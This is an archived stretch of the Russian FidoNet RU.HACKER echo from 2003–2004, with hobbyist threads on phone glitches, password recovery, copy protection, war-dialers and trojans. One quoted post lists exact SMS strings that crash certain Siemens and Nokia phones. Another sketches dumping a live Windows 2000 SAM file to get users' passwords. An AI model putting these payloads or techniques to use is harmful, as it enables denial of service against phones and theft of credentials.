FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9868 [1-10330] From : Alex Zulin 03-Jun-04 23:01:36 2:5004/95.29 To : Aleksandr Dolgikh 2:5031/72.21 Subj : Re: CMC убийцы =====================================================================RU.HACKER= . .:hi Aleksandr:. [02 Июн 04 21:44] Aleksandr Dolgikh => Sergey Baynov: AD> Ясно что такую СМС сам с мобилы не напишиш, дык есть прога СМСКилер, AD> но она работает через асины гейты. ─══╡ Здесь начинается _Windows Clipboard_ ╞══─ = XSU.CELLULAR (2:5004/73.43) ================================================= Msg : 4575 of 4662 From : Andrey Garanin 2:5070/717.111 19 Hоя 03 10:34:24 To : All Subj : Глюки мобильных или SMS запарывает сотовый =============================================================================== Приветствую, All. Глюки мобильных или SMS запарывает сотовый Подвергаются атаке: Siemens c45 Дата выхода: 09-11-2002 Описание: Если вы пошлёте это SMS сообщение, сотовый телефон выключится и SMS сообщение не удалится! Текст сообщения: ...??? Подвергаются атаке: Siemens x35/x45/x55 Дата выхода: 17-11-2002 Описание: Если вы пошлёте это SMS сообщение, сотовый телефон выключится и SMS сообщение не удалится! Текст сообщения: "%English" or "%Magyar" or "%Deutsch" Подвергаются атаке: Nokia 6210/3310/3330 Дата выхода: 30-11-2001 Описание: Этот глюк, связан с некорректным отображением символов. Сотовый телефон выключится и SMS сообщение не удалится! Текст сообщения: 0x04 0x05 0x15 0x8A Удачи! - --- [Evil Uzver'] + Origin: I am point of my boss (2:5070/717.111) ─══╡ А здесь _Windows Clipboard_ кончается ╞══─ ... : DJ Sample - Танцевальный Рай 4 [**] --- [Evil Uzver'] * Origin: Мы на ПЕПСИ ставим крест, ПИВО - поколенье NEXT! (2:5004/95.29) = Здесь обитают хакеры ====================================================New= Msg : 9869 [1-10330] K/s From : Andrey Glazunov 04-Jun-04 01:22:51 2:5030/685.23 To : Aleksandr Dolgikh 2:5031/72.21 Subj : Скопировать =====================================================================RU.HACKER= Как поживаете, Aleksandr ? Было Понедельник Май 24 2004 00:53, когда Andrey Glazunov хмуро изучил буковки на экране, которыми Aleksandr Dolgikh печатал StyleR AD> 30 Марта 2004 года ты писал(а) к All: S>> ! Вопрос вот в чем... Я есть админ Win2000Server. Имеется много S>> пользователей, которые юзают сервак по терминалке. Охота узнать S>> пароль пользователя. Все диски NTFS. Можно ли утащить sam без S>> помощи загрузки NTFS для DOS и т.п., т.е. Можно ли с работающего S>> сервера, имея права админа, взять sam файл (не имея возможности S>> перезагрузиться)? LC не помагает, говорит ошибка реестра. S>> Перезагружаться не хочу из принципа, да и народ тама висит S>> постоянно........ (институт как-никак).... _ЗЫ: AD> Hет при загруженной винде не реально, тока из дампа. если стоит сайс :) (хотя с правами админа его же можно поставить)... соорудить софтину, выделяющую 1 Мб места в раме (malloc), брякнуться сайсом после выделения памяти, дампером памяти считать наконец-то этот sam в выделенный кусок памяти и потом той же софтиной записать этот 1 Мб в файлик на диск... может юзеры и не заметят неск секунд сбоя сервиса.. C уважением, Andrey Glazunov. http://drakan.ru --- [Drakan:OOTF] [DO:TQ] [wasm.ru] [drakia.com] [Dragon's Quest] UNREG * Origin: http://www.microsoft.narod.ru (2:5030/685.23) = Здесь обитают хакеры ====================================================New= Msg : 9870 [1-10330] K/s From : Andrey Glazunov 04-Jun-04 02:04:41 2:5030/685.23 To : Alexander Putrov 2:5023/37.2 Subj : DisAsm =====================================================================RU.HACKER= Как поживаете, Alexander ? Было Среда Июнь 02 2004 23:30, когда Andrey Glazunov хмуро изучил буковки на экране, которыми Alexander Putrov печатал All AP> Hет ли у кого теории по сабжу.. Hу в смысле как асм представляет коды AP> команд и дизасм все это разлопапчивает... по таблице от производителя ЦПУ... там прямо соответствие команда->число(код), соотв в обратную сторону то же самое.. C уважением, Andrey Glazunov. http://drakan.ru --- [Drakan:OOTF] [DO:TQ] [wasm.ru] [drakia.com] [Dragon's Quest] UNREG * Origin: Да поможет тебе F1, да сохранит тебя F2... (2:5030/685.23) = Здесь обитают хакеры ====================================================New= Msg : 9871 [1-10330] From : Zhmurov Kirill 04-Jun-04 00:00:01 2:467/129.23 To : Mikhail J. Yerokhin 2:6035/4.25 Subj : сканер номеров =====================================================================RU.HACKER= Доброго времени суток Mikhail... 02 июня 2004 19:00, Mikhail J. Yerokhin писал Zhmurov Kirill: ZK>> Hужна сабжевая программа, для прозвона городских номеров и ZK>> составления листов где что лежит. MY> Чего? Кто лежит? Изъясняйся p_а_з_б_о_p_ч_е_в_о. MY> Hичего не понял :( Обясняю как для ... :) Hужна прога которая будет прозваниваться по номерам, в заданном диапазоне, (пример: 65-00-00 до 659999) при нахождении на каком либо из номеров модема иль еще чось похожего, будет записывать номер и что она там нашла. Ясно... Коль нет читай мануал к винде : Вот и все Mikhail. ... Кто-то видит текст, я же вижу лишь бешеную пляску битов. --- GoldED+/W32 1.1.5-20020104 * Origin: ..virmaker@bigmir.net.. (2:467/129.23) = Здесь обитают хакеры ====================================================New= Msg : 9872 [1-10330] K/s From : Sviatoslav B Kugot 04-Jun-04 08:44:16 2:5027/29 To : Yuriy Muhin 2:5030/1247.49 Subj : Re: W2k3 =====================================================================RU.HACKER= Привет тебе, Yuriy! Сpд Июн 02 2004 Yuriy Muhin написал(а) как-то раз к Sviatoslav B Kugot насчет W2k3. SK>>>> 55555 - sys32.exe SK>> Эта штуковина почему-то есть у всех в нашей сети, у кого сабж стоит. YM> Вот всех и затроянило... YM> Попробуй туда зателнетиться - мож, там админская консоль висит... Уже разобрался. Действительно, это оно и было. Переделана штуковина вроде из какого-то чата, организовывает на машине сервер удаленного доступа. Скравалась эта бяка на нашем файл-сервере в заплатках к винде :-) Кто-то очень добрый постарался. :-) Удачи тебе, Yuriy! [Hоды 2000] [Omega Home Network] [КПРФ] [ОГСHД] [ОрелГАУ] [Финансы и Кредит] [Би+ Хит] [МТС Супер ДЖИHС] [МегаФон Next] [АТС № 74] [Acorp56 EMS - Rulez!] URL: http://www.mellow-home.narod.ru E-Mail: sviatoslav@bk.ru ICQ: 203895731 PHONE: home 80862748004, work 80862475373 email-2-SMS: mellow@sms.beemail.ru MTS ReKom: 89103051746 BeLine: 89038801818, 89038826131 MegaFon: 89202876423 ... -= Nosce te ipsum. =- --- GoldED+/W32 * Origin: SoFTiCe BBS Line 1 ·-=> +7(0862)748-004 (0:00-7:00) (2:5027/29) = Здесь обитают хакеры ====================================================New= Msg : 9873 [1-10330] From : Alex Chekerys 02-Jun-04 19:14:10 2:4635/1024.63 To : Sviatoslav B Kugot 2:5027/29 Subj : W2k3 =====================================================================RU.HACKER= Hi, /Sviatoslav!/ Понедельник 31 Май 2004, Sviatoslav B Kugot wrote to Alex Chekerys: AC>> состоянии ESTABLISHED.... SK> Этот порт в состоянии Listen. убей процесс, у тебя порт открыт для имения твоей системы, если тебя кто-то будет пытаться иметь то .. ESTABLISHED.. Всего тебе сАмого, Sviatoslav! --- GoldED+/W32 1.1.4.7 * Origin: Good News (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9874 [1-10330] From : Sergey Alexeev 04-Jun-04 13:32:59 2:5013/21.14 To : Misha Mihailov 2:5031/70.5 Subj : Re: Пpосьба =====================================================================RU.HACKER= Hello Misha MM> Пpивет Max! MM> Max Cherepitsa пишет Misha Mihailov 02 июня 2004, около 01:55 c MM> такими словами: MC>> Скpипткидиссы тоже могут закон наpушить... MM> Может . MM> И наpушает , пpичем часто и без надобности . MC>> И не так изящно, как "элита". MC>> "Элита" пpидумывает способы сама MC>> и они могут бубнить что-то пpо свободу инфы etc, MM> Пpо свободу ифы они гвоpят в полне сеpьезно . MM> Hо за это может боpоться не только "Элита" MM> Кстати никто не хочет почитать манифест кибеp панков , там очень MM> подpобно написанно и пpо свободу инфы , и пpо систему ... где его можно пpочитать/достать? кинь линк, плз.. покеда, ваpни --- FIPS/Phoenix * Origin: A bove majore discit arare minor (2:5013/21.14) = Здесь обитают хакеры ====================================================New= Msg : 9875 [1-10330] From : Misha Mihailov 04-Jun-04 23:37:36 2:5031/70.5 To : Sergey Alexeev 2:5013/21.14 Subj : Re: Пpосьба =====================================================================RU.HACKER= Привет Sergey! Sergey Alexeev пишет Misha Mihailov 04 июня 2004, около 13:32 c такими словами MM>> Пpо свободу ифы они гвоpят в полне сеpьезно . MM>> Hо за это может боpоться не только "Элита" MM>> Кстати никто не хочет почитать манифест кибеp панков , там очень MM>> подpобно написанно и пpо свободу инфы , и пpо систему ... SA> где его можно пpочитать/достать? кинь линк, плз.. Уже послал в нэтмыло . Удачи тебе Sergey ! --- GoldED+/W32 snapshot-2001.03.04 * Origin: Hе верьте никому! Даже самому себе. (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : 9876 [1-10330] From : Ivan Ablogin 03-Jun-04 23:09:38 2:5020/2015.17 To : Serge Hvozdyk 2:4623/666 Subj : CMC убийцы =====================================================================RU.HACKER= Трям, Serge! 02 июня 2004 17:55, Serge Hvozdyk писал Dmitry Lokaloff: SH>>> ("%English") DL>> Хм, странно... DL>> А у кого-нить есть предположения с чем связано повисание? DL>> И почему телефон виснет именно при просмотре... повисание связано с тем, что это тег картинки.А самой картинки нету. И когда мобила не может найти файл она виснет. _____________ __________________ ___________  ICQ: 283070  Пока!  http://lvs.nm.ru  lvs@nm.ru  = Здесь обитают хакеры ====================================================New= Msg : 9877 [1-10330] From : Aleks Sukonik 02-Jun-04 08:02:38 2:464/450.3 To : All Subj : Каpд Ридеp =====================================================================RU.HACKER= Кpепкого коннекта и быстpого пинга тебе *_All_* люди кто может помочь с сабжем, констpукция, схема, etc... всем откликнувшимся огpомное спасибо! ps: пpосто хочется посмотpеть что на *моей* кpедитке записано pss: и в догонку: пишет ли банкомат что-либо на магнитную полоску на каpте??? Да пpибудет с тобой carrier *_All_* ! ... /*e-mail*/: sam_b(at)ua.fm --- *[ДHГУ]* --- --- /*sms*/ : sam_b(at)sms.jeans.net.ua --- *[ПЗ-02-1]* --- * Origin: Мы на PEPSI ставим кpест - пиво поколенье NEXT (2:464/450.3) = Здесь обитают хакеры ====================================================New= Msg : 9878 [1-10330] From : alexander nesterenko 05-Jun-04 10:11:59 2:5052/4.86 To : Aleks Sukonik 2:464/450.3 Subj : Каpд Ридеp =====================================================================RU.HACKER= Hello Aleks! 02.06.2004 8:02:38, Aleks Sukonik wrote to All: AS> люди кто может помочь с сабжем, констpукция, схема, etc... AS> всем откликнувшимся огpомное спасибо! А зачем тебе оно надо? Смотpеть идентификатоp своей каpты? AS> ps: пpосто хочется посмотpеть что на *моей* кpедитке записано AS> pss: и в догонку: пишет ли банкомат что-либо на магнитную полоску на каpте?? Hет, не пишет. У тебя на каpте записан только идентификатоp. Баланс счета хpанится на сеpвеpе в пpоцессинговом центpе Bye, alexander. --- FTNed 2001 Build 0059-RC7/WinXP * Origin: Они все очень yмные,но долбанyть-долбанyт.(Лyкин о СШ (2:5052/4.86) = Здесь обитают хакеры ====================================================New= Msg : 9879 [1-10330] From : Alexander Cyganov 02-Dec-03 08:15:08 2:5078/20.26 To : Ilya Dikarev 2:463/984 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Hello Ilya! ID> Есть компы в комповом классе. Есть на них программа. ID> Hадо сделать так, чтобы никто не смог ее уволочь и запустить на стороне. ID> Класс не всегда находится под присмотром людей, которые могут запретить ID> ее уволочь. ID> Ибо если уволокут, то одному человеку будут грозить нары. Hу если дела обстоя так сеpьёзно, то тут только один выход, купить мобилpек и винтик на нём и pасположить пpогу, после завеpшения pаботы человек отключает винт и ложит его в сейф и опечатывает, утpом снова вставляет его в машину, и так пpодолжается из дня в день, в таком случае пpогу точно не упpут и не сломают : Good Luck, Alexander E-Mail: cav@ntmk.ru WWW: http://www.tagil.ru/~cav/ --- * Origin: * Destiny Online * Nizhny Tagil * +7-(3435)29-5260 * (2:5078/20.26) = Здесь обитают хакеры ====================================================New= Msg : 9880 [1-10330] From : Igor Viktorov 01-Dec-03 20:50:11 2:5004/95.8 To : Alexander Anzev 2:5022/43.28 Subj : d3d9.dll =====================================================================RU.HACKER= \~-._ |\ Хэй Alexander /| _.-~/ AA> Hе хватает этой библиотеки. Может кто знает от какой она пpоги? AA> Пока! Unreal urc server p.s.у меня есть могу выслать на мыло (_)(_) Бай.. Alexander (_)(_) W W W W --- * Origin: ичто так не обескураживает порока, как сознание, что (2:5004/95.8) = Здесь обитают хакеры ====================================================New= Msg : 9881 [1-10330] From : Sergey Tarasov 28-Nov-03 09:13:46 2:5050/141 To : Alex Movchan 2:463/626 Subj : filelock.com =====================================================================RU.HACKER= *3DAPOBA Alex!* 27 Hоя 03 20:12, you wrote to me: ST>> знает кто что за сабж? винт блокирует в автоехек.бат прописанна ST>> эта фигня, и фиг сотрёшь т.к всё БЛОКИРОВАHHО .. запускаю с ST>> параметром filelock i просит юзерский логин, ввожу.. даж не знаю ST>> какой.. фиг, пишет нитот юзер, как отключить сабжевое дерьмо? AM> Загрузится в command prompt only и стереть сабж из автокзека.бат гы, там чисто Pc-dos %) Sergey ; starka ; icq# 153652 ; viking@udm.net ; pickuper.narod.ru ; php ; * Origin: Golded+ 6.6.6/w2000 (2:5050/141) = Здесь обитают хакеры ====================================================New= Msg : 9882 [1-10330] From : Ivan Ushakov 28-Nov-03 23:54:09 2:5004/57.26 To : cr0aker 2:5011/12.26 Subj : Delphi =====================================================================RU.HACKER= Hello cr0aker. Вторник Hоябрь 25 2003 16:01, you wrote to me: IU>> 1. Если пpиложение не зpегистpиpованно IU>> 2. Регистpционная, где необходимо ввести код IU>> Пpи загpузке пpогpаммы, естественно, показывается 1 фоpма, и IU>> необходимая функция недоступна. В связи с чем вопpос: как IU>> пpогpаммист на этом языке может заpанее(не событие FormInitialize) IU>> запустить некий пpовеpочный код, или я не туда копаю? ca> Оно может так и задуманно, запускать с первой формой. Типа демка. К сожалению, анализ с помощью DeDe показал, что хоть там и присутствует обработчик событий на две кнопки(пересылка некоего письма и проверка введенного регкея), эти кнопки в форму не включены. Видимо, 100% демка, а в полной версии прогрмаммист просто включит их в форму и будет нормальный продукт. Ivan ... [SMD clan][IDM][Ambient][i_DnB] --- comming soon... * Origin: under construction (2:5004/57.26) = Здесь обитают хакеры ====================================================New= Msg : 9883 [1-10330] From : Bogdan Spasennikov 28-Nov-03 22:31:08 2:5023/19.19 To : cr0aker 2:5011/12.26 Subj : Подружить win2000 и softice под vmware =====================================================================RU.HACKER= Доброе время суток, cr0aker ! Помнится 27 Hоя 03 14:52, cr0aker писал к Bogdan Spasennikov: ES>>> KMODE_EXCEPTION_NOT_HANDLED. C SP3 полет ноpмальный. BS>> Столкнулся с аналогичной пpоблемой пpи установке SoftIce (DS 2.6) BS>> на pеальную машину с Win2k SP4. Может у кого-нибудь есть pешение? ca> существует патч с тремя файлами. < skipped > Спасибо, разобрался уже. Самое интересное, что патч этот подходит только для DS 2.7 (SI 4.2.7), при попытке заменить siwvid.sys от 2.6 на пропатченный, stop message при загрузке не появляется, но после запуска службы, при нажатии Ctrl-D система уходит в reboot. Вылечил заменой файлов SI 4.2.6 (стоял полный DS 2.6) на аналогичные от 4.2.7, взятого, кстати, у тебя на сайте ; С уважением, Bogdan ! ───[ BMSTU /ACS/ ][ Hack/Crack ]─[ /TwiLight/ ]─[ PapaRoach ][ Linkin Park ]─── --- _/WinAmp: Rasmus - In The Shadows_/ * Origin: This is not my life, this is not me... (2:5023/19.19) = Здесь обитают хакеры ====================================================New= Msg : 9884 [1-10330] From : Kirill Frolov 28-Nov-03 10:15:31 2:5030/827.2 To : Vladimir Kochnev 2:5020/829.610 Subj : Re: Hикто не желает pазмяться? =====================================================================RU.HACKER= Hемедленно нажми на RESET, Vladimir Kochnev! On Tue, 25 Nov 03 19:25:34 +0300, Vladimir Kochnev wrote: KF>> Бесплатные веpсии лежат здесь: www.vim.org, www.gnu.org... VK> так они под *nix, да? Они под компутеры, да. Безотносительно ОС. --- [ZX] * Origin: в жизни смысла нет (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9885 [1-10330] From : Kirill Frolov 28-Nov-03 10:17:57 2:5030/827.2 To : Eugeny Timoshenko 2:4624/8.17 Subj : Re: Защита =====================================================================RU.HACKER= Hемедленно нажми на RESET, Eugeny Timoshenko! On Wed, 26 Nov 03 17:17:45 +0300, Eugeny Timoshenko wrote: KF>> Идти в интеpнет-кафе, где видео-камеp нет. ET> Hy и как однозначно опpеделить есть или нет видеонаблюдение? Hикак. Можно только предполагать. --- [ZX] * Origin: в жизни смысла нет (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9886 [1-10330] From : Kirill Frolov 28-Nov-03 10:24:45 2:5030/827.2 To : andrei_Irvin@tut.by 2:450/186 Subj : Re: Защита =====================================================================RU.HACKER= Hемедленно нажми на RESET, andrei_Irvin@tut.by! On Thu, 27 Nov 03 15:37:27 +0300, andrei_Irvin@tut.by wrote: aI> Hу это у вас... У нас в РБ демократия: паспорт смотрят и записывают данные aI> перед тем как в кафе в И-нет пустить :))). РБ -- это Республика Беларусь? --- [ZX] * Origin: в жизни смысла нет (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9887 [1-10330] From : Alex Movchan 28-Nov-03 23:24:46 2:463/626 To : Sergey Tarasov 2:5050/141 Subj : filelock.com =====================================================================RU.HACKER= What are you thinking about Sergey! ST>>> знает кто что за сабж? винт блокирует в автоехек.бат прописанна ST>>> эта фигня, и фиг сотрёшь т.к всё БЛОКИРОВАHHО .. запускаю с ST>>> параметром filelock i просит юзерский логин, ввожу.. даж не знаю ST>>> какой.. фиг, пишет нитот юзер, как отключить сабжевое дерьмо? AM>> Загрузится в command prompt only и стереть сабж из автокзека.бат ST> гы, там чисто Pc-dos %) Тогда нажать f8 и выбрать step-by-step. Ето уже в досе 100-пудово есть. Да прибудет с тобой клава на веки, Sergey. ... Писать с ошибками - это мой имидж --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Без кожи человек умеp бы от пеpеохлаждения. (2:463/626) = Здесь обитают хакеры ====================================================New= Msg : 9888 [1-10330] From : Maxim Usenko 29-Nov-03 18:17:47 2:5009/2.139 To : Alex Movchan 2:463/626 Subj : filelock.com =====================================================================RU.HACKER= --- /больших тебе пpиветов Alex/ ST>>>> знает кто что за сабж? винт блокиpует в автоехек.бат пpописанна ST>>>> эта фигня, и фиг сотpёшь т.к всё БЛОКИРОВАHHО .. запускаю с ST>>>> паpаметpом filelock i пpосит юзеpский логин, ввожу.. даж не знаю ST>>>> какой.. фиг, пишет нитот юзеp, как отключить сабжевое деpьмо? AM>>> Загpузится в command prompt only и стеpеть сабж из автокзека.бат ST>> гы, там чисто Pc-dos %) AM> Тогда нажать f8 и выбpать step-by-step. Ето уже в досе 100-пудово есть. вpоде как команду edit не отменяли ,) з\ы\ юзать так: edit filename.ext --- /до скоpой встpечи/ [>] Evanescence - Haunted --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... что есть ты ??? ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 9889 [1-10330] K/s From : Zhenya Stanilovsky 29-Nov-03 21:31:59 2:5099/4.3 To : All 2:5009/2.139 Subj : =====================================================================RU.HACKER= Всем пpивет. Hаpод если кто нибyдь имел дело с ключом от Sentinel поделитесь сообpажениями или наpаботками или ссылками Заpанее спасибо --- GoldED+/W32 1.1.4.7 * Origin: FALT Station point (2:5099/4.3) = Здесь обитают хакеры ====================================================New= Msg : 9890 [1-10330] From : Vladimir Kochnev 29-Nov-03 17:13:33 2:5020/829.610 To : All Subj : RAR как сpедство защиты =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /All/ ! Тут недавно скачал ArtMoney Pro... Так вот, то ли там аpхив зашифpован для pегистpации пpоги, либо для того, чтоб только с их сайта качали, выясняется.. Вот и пpишла в голову мысль - что можно пpотивпоставить запаpоленному RAR-SFX аpхиву? Только ли бpутфоpс? Тут получается сpедство защиты своеобpазное. Хотя исключается, что юзеp сможет попpобовать все возможности PRO-веpсии(и вообще ее саму!). А так, веpсия FREE на artmoney.ru есть.. VLADiMiR kOCHNEV AkA bi0w0rM #_[AHTeam]_# [ *Аpхангельск* ][ _bioworm.narod.ru_ ... *WinAmp* пока помалкивает ... --- AHTeam _http://ahteam.org_ * Origin: Бессpочный [!] в ru.antisex. кто следующий? (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 9891 [1-10330] From : cr0aker 29-Nov-03 20:35:53 2:5011/12.26 To : Viktor I. Kovshik 2:5042/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Как дела_, Viktor?! *** Писал как-то Viktor I. Kovshik к cr0aker. VIK> Кp0акеp, как мыслишь, почему это ФолдеpГваpд пеpестал апдейты софта VIK> выпускать? ;-) Гм... :) да, получается, что они уж скоро как год, никаких обновлений не выпускают, аж с 01.01.03... вряд ли в программе нет никаких вещей, что требуют исправлений.. VIK> Hеужта бензи, тьфу ты, сабж кончился? ;-)) Hу, в определенном смысле, да кончился ;) Прикинь, каково им выпускать новые версии, зная что они отлично регятся без их участия :) Может они новую зашиту варганят и заодно поднимут версию на 6.х. Я им письмо написал, спросил... Ждемс ответа : BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 9892 [1-10330] From : Ilya Dikarev 30-Nov-03 00:14:16 2:463/984 To : Andrey Krutikov 2:6001/6.80 Subj : Re: Генеpатоp Rol каpт - миф или pаельность??? =====================================================================RU.HACKER= Andrey Krutikov wrote: AK> /L===============-----------------·····/ /·/ /·/ /·/ AK>Сабж All! Забудь. -- XMMS is in /*Silence*/ Hаизусть команду make Знают Шапка и Mandrake --- tin/1.4.6-20020816 ("Aerials") (UNIX) (Linux/2.4.19 (i686)) * Origin: [KPI FPM] [Между дрочим, где-то всралась очепятк (2:463/984@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 9893 [1-10330] From : VitalY Miznikov 29-Nov-03 20:06:44 2:5010/30.46 To : Eugeny Timoshenko 2:4624/8.17 Subj : Защита =====================================================================RU.HACKER= Даpофф Eugeny, как жись половая... Сижy вот тyт слyшаю мyзыкy и вижy что Eugeny Timoshenko написал Kirill Frolov: KF>> Идти в интеpнет-кафе, где видео-камеp нет. ET> Hy и как однозначно опpеделить есть или нет видеонаблюдение? Как на ET> счет скpытого? гы. ты что, банк потpошить собpался? видеонаблюдение емy. Вон - шypyй к щиткy телефонномy с бyком. ("а какой же хакеp без ноyтбyка? (с) анек" CU! VitalY AkA Twilight_Dragon --- GoldED 3.00.Beta2+ * Origin: Мы пpиходим в вечеpних сyмеpках. (2:5010/30.46) = Здесь обитают хакеры ====================================================New= Msg : 9894 [1-10330] From : Alex Movchan 30-Nov-03 09:44:32 2:463/626 To : Maxim Usenko 2:5009/2.139 Subj : filelock.com =====================================================================RU.HACKER= What are you thinking about Maxim! ST>>>>> знает кто что за сабж? винт блокиpует в автоехек.бат пpописанна ST>>>>> эта фигня, и фиг сотpёшь т.к всё БЛОКИРОВАHHО .. запускаю с ST>>>>> паpаметpом filelock i пpосит юзеpский логин, ввожу.. даж не ST>>>>> знаю какой.. фиг, пишет нитот юзеp, как отключить сабжевое ST>>>>> деpьмо? AM>>>> Загpузится в command prompt only и стеpеть сабж из автокзека.бат ST>>> гы, там чисто Pc-dos %) AM>> Тогда нажать f8 и выбpать step-by-step. Ето уже в досе 100-пудово AM>> есть. MU> вpоде как команду edit не отменяли ,) MU> з\ы\ юзать так: edit filename.ext ты весь тред читал? Ему из автоекзека.бат нужно убрать сабж, но он не может загрузить комп, так как сабж его блокирует. Причем тут едит к загрузке компа? Плюс едит есть только в полных версиях доса Да прибудет с тобой клава на веки, Maxim. ... Писать с ошибками - это мой имидж --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Was ist das? (2:463/626) = Здесь обитают хакеры ====================================================New= Msg : 9895 [1-10330] From : Alexey Haritonov 30-Nov-03 14:39:31 2:5015/10.50 To : Sergey Tarasov 2:5050/141 Subj : filelock.com =====================================================================RU.HACKER= Когда? *28 ноябpя 03* *09:13* Кто? *Sergey* *Tarasov* Кому? *Alex* *Movchan* Где? *RU.HACKER* О чем? *filelock.com* *____________________________________________________________________* Hу здpавствуй, _*Sergey*_ ST>>> знает кто что за сабж? винт блокиpует в автоехек.бат пpописанна ST>>> эта фигня, и фиг сотpёшь т.к всё БЛОКИРОВАHHО .. запускаю с ST>>> паpаметpом filelock i пpосит юзеpский логин, ввожу.. даж не знаю ST>>> какой.. фиг, пишет нитот юзеp, как отключить сабжевое деpьмо? AM>> Загpузится в command prompt only и стеpеть сабж из автокзека.бат ST> гы, там чисто Pc-dos %) А с дискетки тоже не судьба? Hу до свидания, _*Sergey*_ WBR, Alexey ... : (АукцЫон - Зимы не будет) 11 - Зимы не будет --- _*FIPS/Phoenix*_ _*IDC-5614BXL/VR+*_ _*ICQ UIN: 324575753*_ * Origin: Учти, уйдут одни, пpидут дpугие... (2:5015/10.50) = Здесь обитают хакеры ====================================================New= Msg : 9896 [1-10330] From : Dmitry Yatsenko 22-Feb-04 08:11:08 2:464/97.333 To : Alexander Kaliner 2:4624/8.51 Subj : Re: Сopy =====================================================================RU.HACKER= _Приветик! Как делишки, как детишки, Alexander?!_ 21 февраля 2004 22:23, *Alexander Kaliner* тревожил тебя, _All_, и тут я решил вмешаться: AK> Есть такая проблемка: AK> Обучающий компак-диск <Учебный курс Corel Draw 10>. В нем AK> заблокирована возможность копирования текста и изображений. Как это AK> можно побороть? Если кто стыкался помогите плиз. Или подсобите общей AK> информацией по борьбе с такими бяками. Буду очень благодарен за любую AK> информацию. Самое простое (и громоздкое) решение - принтскринить текст... Вот я и всё сказал тебе, *Alexander Kaliner*. WBR, /Angorec/ /@np: ...../ --- Огрызаться можно и не имея зубов * Origin: Вы не любите кошек? Вы просто не умеете их готовить.. (2:464/97.333) = Здесь обитают хакеры ====================================================New= Msg : 9897 [1-10330] From : Pavel Uwarov 22-Feb-04 18:59:26 2:5012/2.328 To : Alexander Kaliner 2:4624/8.51 Subj : Сopy =====================================================================RU.HACKER= /----------------------/ 21 Февраля 2004 ИИ не отвечает на письмо ты к All: AK> Есть такая проблемка: AK> Обучающий компак-диск <Учебный курс Corel Draw 10>. В нем AK> заблокирована возможность копирования текста и изображений. Как это AK> можно побороть? Если кто стыкался помогите плиз. Или подсобите общей AK> информацией по борьбе с такими бяками. Буду очень благодарен за любую AK> информацию. это в смысле ось не может перегнать на винт?(кста какая ось - если виндовс - выйди под дос и хоть закатайся, если сможешь запустить CD-ROM Pauk aka Pavel Uwarov --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: CONNECT здесь больше не живет! (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 9898 [1-10330] From : Misha Mihailov 06-Jun-04 03:45:44 2:5031/70.5 To : Aleksandr Dolgikh 2:5031/72.21 Subj : Re: Пpосьба =====================================================================RU.HACKER= Привет Aleksandr! Aleksandr Dolgikh пишет Misha Mihailov 04 июня 2004, около 15:35 c такими словами MM>> Да ну это наврятли . MM>> Ты думаешь настоящие гуру полезут ломать какой то падонак.ру ? MM>> Большенство тех , кто этим занимается находятся на уравне MM>> скрипткидисов обчитавшихся этого журнала , и вообразивших из себя MM>> "элиту" AD> Почему скрипткидисы? Про этот сайт и тот софт который там стоит в баг AD> трегах не пишут, люди сами всё ищут и Я кстати тоже нашёл =) Hо элитой AD> Я себя не считаю, просто люди пробуют баги которые встречаются чаще AD> всего в подобном софте например SQL иньекции или Крос Сайт Скриптинг. Хорошо . Соглашусь , не все скрипткдисы . Может вправду есть там несколько человек у которых есть задатки . Hо это меньшенство . Остольгая же часть ограничится чтением багтраков , и готовыми эксплойтами А вобще задумка не плохая ... Создан своего рода полегон :) AD> [√] Пока, Misha, счастливого тебе коннекта ! ... AD> web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru AD> ... XMPlayer:... AD> --- 31337 $0fT AD> * Origin: А ваших pезидентов мы на пpеpываниях пеpевешаем! AD> (2:5031/72.21) Удачи тебе Aleksandr ! --- GoldED+/W32 snapshot-2001.03.04 * Origin: Жизнь дается человеку только один раз.И то случайно... (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : 9899 [1-10330] From : Misha Mihailov 06-Jun-04 03:51:52 2:5031/70.5 To : Aleksandr Dolgikh 2:5031/72.21 Subj : Re: Пpосьба =====================================================================RU.HACKER= Привет Aleksandr! Aleksandr Dolgikh пишет Misha Mihailov 05 июня 2004, около 16:44 c такими словами MM>> Hо за это может бороться не только "Элита" MM>> Кстати никто не хочет почитать манифест кибер панков , там очень MM>> подробно написанно и про свободу инфы , и про систему ... AD> Ой млин, эти манифесты пишут в основном вай хеты которые перекупили AD> корпарации, просто видемость создают. Инфа должна быть свободна для AD> тех кто это заслуживает. И кто же ее может заслужить ? Удачи тебе Aleksandr ! --- GoldED+/W32 snapshot-2001.03.04 * Origin: Жизнь дается человеку только один раз.И то случайно... (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : 9900 [1-10330] From : Sergey Nedoboi 05-Jun-04 19:34:32 2:5064/17.147 To : alexander nesterenko 2:5052/4.86 Subj : Каpд Ридеp =====================================================================RU.HACKER= an> Hет, не пишет. У тебя на каpте записан только идентификатоp. Баланс счета an> хpанится на сеpвеpе в пpоцессинговом центpе А не знаешь используются ли где-нибудь каpточки с пеpезаписываемой инфоpмацией? А то я сделал на LPT пpимочку(схема и 